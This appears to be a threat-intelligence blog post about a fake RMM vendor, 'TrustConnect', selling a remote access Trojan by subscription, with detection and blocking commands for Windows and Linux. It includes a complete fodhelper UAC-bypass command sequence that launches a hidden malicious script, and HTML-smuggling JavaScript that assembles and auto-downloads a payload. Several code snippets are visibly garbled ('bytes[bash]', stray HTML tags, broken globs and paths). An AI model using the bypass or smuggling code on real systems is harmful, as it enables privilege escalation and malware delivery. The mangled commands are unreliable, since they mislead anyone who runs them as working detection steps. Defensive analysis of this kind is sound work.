Listen to this Post

Introduction:
In a sophisticated twist on the remote access Trojan (RAT) economy, cybercriminals have begun creating entirely fictitious remote monitoring and management (RMM) vendors to distribute malware under the guise of legitimate enterprise software. Researchers at Proofpoint recently uncovered “TrustConnect,” a fake RMM tool sold for $300 per month that is actually a full-featured RAT backdoor, complete with a professional website and a legitimate Extended Validation (EV) code-signing certificate . This evolution represents the commercialization of remote access malware into a subscription-based model—RAT-as-a-Service (RATaaS)—that lowers the barrier to entry for aspiring cybercriminals while increasing the difficulty of detection for defenders .
Learning Objectives:
- Understand the anatomy of a RATaaS operation and how criminals are abusing trust mechanisms like EV certificates
- Learn technical indicators of compromise (IOCs) and behavioral patterns associated with fake RMM/RAT payloads
- Master practical detection and mitigation techniques using command-line tools across Windows and Linux environments
- Analyze evasion techniques including HTML smuggling, process masquerading, and living-off-the-land strategies
- Develop proactive defense strategies against subscription-based malware delivery models
You Should Know:
1. Anatomy of the TrustConnect RATaaS Operation
The TrustConnect operation represents a new level of criminal professionalism. The attackers registered trustconnectsoftware[.]com on January 12, 2026, and populated it with AI-generated content including fake customer testimonials, pricing tiers, and technical documentation to appear legitimate . They went so far as to obtain a genuine EV code-signing certificate—which requires rigorous validation by certificate authorities—to digitally sign their malware and bypass security controls that trust signed binaries .
Step‑by‑step guide to understanding the attack chain:
The infection begins with phishing emails posing as project bids or meeting invitations. These contain links to a malicious executable (MsTeams.exe) that drops TrustConnectAgent.exe. Below is the observed execution flow:
Phishing Email → Malicious Link → MsTeams.exe → TrustConnectAgent.exe → C2 Communication (178[.]128[.]69[.]245)
The RAT provides attackers with:
- Full keyboard and mouse control
- Screen recording and streaming capabilities
- File transfer and command execution
- User Account Control (UAC) bypass
Detection commands for network analysts:
Capture traffic to known malicious C2 (Linux/macOS) sudo tcpdump -i eth0 host 178.128.69.245 -w trustconnect-traffic.pcap Check for established connections to suspicious IPs (Windows) netstat -ano | findstr 178.128.69.245 DNS query monitoring for trustconnectsoftware[.]com (Linux) sudo tcpdump -i eth0 -n port 53 | grep trustconnect
2. HTML Smuggling and Multi-Stage Payload Delivery
Modern RAT delivery increasingly relies on HTML smuggling—a technique that embeds malicious payloads within HTML files to evade network-based detection. When victims open the HTML in a browser, client-side JavaScript reconstructs the malware locally . This bypasses email gateways that scan attachments because the malicious content is only assembled on the victim’s machine.
Step‑by‑step HTML smuggling analysis:
The DCRat campaign demonstrated how effective this technique can be. Attackers distributed password-protected ZIP archives embedded in HTML files disguised as legitimate applications like TrueConf and VK Messenger .
// Example of HTML smuggling code (conceptual)
function base64ToArrayBuffer(base64) {
var binaryString = window.atob(base64);
var bytes = new Uint8Array(binaryString.length);
for (var i = 0; i < binaryString.length; i++) {
bytes[bash] = binaryString.charCodeAt(i);
}
return bytes.buffer;
}
// Malicious payload embedded as base64
var payloadBase64 = "UEsDBBQAAAAIA..." // Truncated example
var blob = new Blob([base64ToArrayBuffer(payloadBase64)], {type: 'application/zip'});
var link = document.createElement('a');
link.href = URL.createObjectURL(blob);
link.download = 'Project_Details.zip';
link.click();
Detection methods for HTML smuggling:
Extract JavaScript from HTML files and search for base64 patterns
grep -E "(base64|atob|createObjectURL|Uint8Array)" suspicious.html
Monitor for browser processes spawning compression utilities (Windows)
Get-Process | Where-Object {$_.ProcessName -match "winrar|7z|zip|powershell"}
3. Persistence Mechanisms Across Operating Systems
Both TrustConnect and similar RATs like PyRAT and NonEuclid employ robust persistence mechanisms to maintain access after reboots. Understanding these helps incident responders locate and remove infections .
Linux persistence detection:
PyRAT, a Python-based RAT packaged as an ELF binary, uses XDG autostart directories for persistence on Linux systems .
Check for suspicious autostart entries
ls -la ~/.config/autostart/
cat ~/.config/autostart/.desktop | grep -E "Exec=|Name="
Examine systemd user services for persistence
find ~/.config/systemd/user/ -name ".service" -exec grep -l "ExecStart" {} \;
Check cron jobs for unusual entries
crontab -l
sudo crontab -l
ls -la /etc/cron./
Windows persistence detection:
NonEuclid RAT, developed in C for .NET Framework 4.8, modifies registry Run keys and creates scheduled tasks .
Check common registry persistence locations
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
List all scheduled tasks and filter for suspicious names
Get-ScheduledTask | Where-Object {$_.TaskName -match "update|security|system|trustconnect|docconnect"}
Check startup folder for unexpected shortcuts
Get-ChildItem "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
4. Evasion Techniques: UAC Bypass and AMSI Evasion
Advanced RATs like NonEuclid implement sophisticated evasion techniques to bypass Windows security mechanisms. UAC bypass allows privilege escalation without user prompts, while AMSI (Antimalware Scan Interface) patching prevents PowerShell and script-based detection .
Step‑by‑step UAC bypass analysis:
Common UAC bypass technique using fodhelper.exe (for educational purposes) This is how attackers might elevate privileges New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -PropertyType String -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd.exe /c start powershell.exe -WindowStyle Hidden -Command malicious.ps1" -Force Execute fodhelper to trigger the bypass Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden Cleanup after execution Remove-Item -Path "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
AMSI bypass detection:
Check for AMSI bypass attempts in event logs
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} |
Where-Object {$_.Message -match "AmsiInitialize|AmsiScanBuffer|reflection"}
Monitor for registry modifications affecting AMSI
Get-WinEvent -LogName Security | Where-Object {$_.Message -match "REG_SET_VALUE.SOFTWARE\Microsoft\AMSI"} -MaxEvents 50
5. Network Infrastructure and C2 Resilience
Following the disruption of TrustConnect’s infrastructure on February 17, 2026, the operators quickly pivoted to new infrastructure and began testing a rebranded version called “DocConnect” or “SHIELD OS v1.0” . This demonstrates the resilience of RATaaS operations and the importance of continuous monitoring.
Infrastructure tracking commands:
Passive DNS reconnaissance (using legitimate threat intelligence sources) dig docconnect[.]com any whois docconnect[.]com SSL certificate transparency log searching curl -s "https://crt.sh/?q=%.docconnect.com&output=json" | jq . Monitor for newly registered domains resembling trusted software Using SecurityTrails API or similar (conceptual) curl -H "APIKEY: YOUR_KEY" "https://api.securitytrails.com/v1/search/list?query=trustconnect|docconnect|shieldos"
Network segmentation to contain RAT communication:
Block C2 communication at the firewall level (Linux iptables) sudo iptables -A OUTPUT -d 178.128.69.245 -j DROP sudo iptables -A OUTPUT -p tcp --dport 4444 -j LOG --log-prefix "RAT C2 ATTEMPT: " Windows Firewall block rules New-NetFirewallRule -DisplayName "Block TrustConnect C2" -Direction Outbound -RemoteAddress 178.128.69.245 -Action Block New-NetFirewallRule -DisplayName "Block High-Risk Ports" -Direction Outbound -Protocol TCP -RemotePort 4444,5555,6666,8080 -Action Block
6. Memory Forensics and Process Analysis
Detecting RATs that don’t write files to disk requires memory forensics. Many modern RATs execute entirely in memory to avoid traditional file scans .
Linux memory analysis:
Capture memory for offline analysis sudo cat /proc/kcore > memory.dump Or use LiME for full capture Check running processes for anomalies ps aux --forest | grep -E "[|systemd|init" Look for bracketed processes lsof -p [bash] | grep -E "deleted|memfd" Check for memory-only files Examine network connections per process sudo netstat -tunap | grep ESTABLISHED
Windows memory analysis:
Use built-in tools for process investigation
Get-Process | Sort-Object CPU -Descending | Select -First 20
Check for processes with no parent (anomalous)
Get-WmiObject Win32_Process | Where-Object {$<em>.ParentProcessId -eq 0 -and $</em>.Name -notmatch "System|smss|csrss|wininit|services|lsass"}
List loaded DLLs for suspicious processes
Get-Process -Name "TrustConnectAgent" -ErrorAction SilentlyContinue |
ForEach-Object { $<em>.Modules } |
Where-Object {$</em>.ModuleName -match "temp|users|AppData"}
7. Ransomware Capabilities in Modern RATs
The convergence of RAT functionality with ransomware capabilities represents a significant threat. NonEuclid includes built-in encryption routines that target specific file extensions and append “.NonEuclid” to encrypted files, effectively operating as both a backdoor and ransomware .
File encryption monitoring:
Monitor for mass file renaming events (Windows)
Get-WinEvent -LogName Security | Where-Object {$<em>.ID -eq 4663 -and $</em>.Message -match "WriteData|Delete"} -MaxEvents 1000 |
Group-Object -Property {$_.Properties[bash].Value} | Sort-Object Count -Descending
Real-time file system monitoring (PowerShell)
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = "C:\Users"
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent $watcher "Created" -Action {
if ($EventArgs.Name -match ".NonEuclid$") {
Write-Host "ALERT: Ransomware activity detected - $($EventArgs.FullPath)"
}
}
Linux file integrity monitoring:
Use inotify to monitor for mass file changes inotifywait -m -r --format '%w%f' -e modify,create,delete /home | while read FILE; do if [[ $FILE == .encrypted ]] || [[ $FILE == .locked ]]; then logger -p auth.alert "Possible ransomware encryption: $FILE" fi done
What Undercode Say:
- The TrustConnect operation demonstrates that cybercriminals are now matching legitimate software vendors in professionalism, complete with AI-generated content, EV certificates, and subscription pricing models. This RATaaS evolution fundamentally changes the threat landscape by making sophisticated malware accessible to low-skill attackers for a monthly fee.
-
Defenders must shift from signature-based detection to behavioral analysis. The use of legitimate code-signing certificates and professional websites means traditional reputation-based blocks will fail. Instead, organizations should focus on anomalous behavior—unexpected outbound connections, unusual process relationships, and unauthorized registry modifications.
-
The rapid pivot from TrustConnect to DocConnect following infrastructure takedown highlights the inadequacy of static blocking alone. Organizations need automated threat intelligence feeds that update in real-time and adaptive defense mechanisms capable of recognizing rebranded variants through behavioral patterns rather than file hashes.
-
The convergence of RAT and ransomware functionality in malware like NonEuclid signals a troubling trend. Attackers no longer need separate toolkits for access and extortion—they can now purchase a single subscription that provides both capabilities, increasing the potential impact of every infection.
-
HTML smuggling and multi-stage delivery techniques specifically target the gap between network security (which sees benign HTML) and endpoint security (which sees the assembled payload). Defense requires integrated visibility across the entire kill chain, with coordination between email security, web gateways, and endpoint detection.
Prediction:
Within the next 12-18 months, we will see the emergence of fully integrated cybercrime SaaS platforms offering bundled services—RAT access, ransomware encryption, data exfiltration storage, and even customer support—all under single subscriptions with tiered pricing. Law enforcement takedowns will become increasingly ineffective as operators adopt resilient, distributed infrastructure models and rapidly rebrand following disruptions. The barrier to entry for cybercrime will continue to fall, leading to a surge in mid-market and small business targeting as attackers seek volume over high-value single targets. Organizations that fail to implement behavior-based detection and automated response capabilities will face near-continuous compromise attempts from a growing pool of RATaaS customers.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Michael Tchuindjang – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


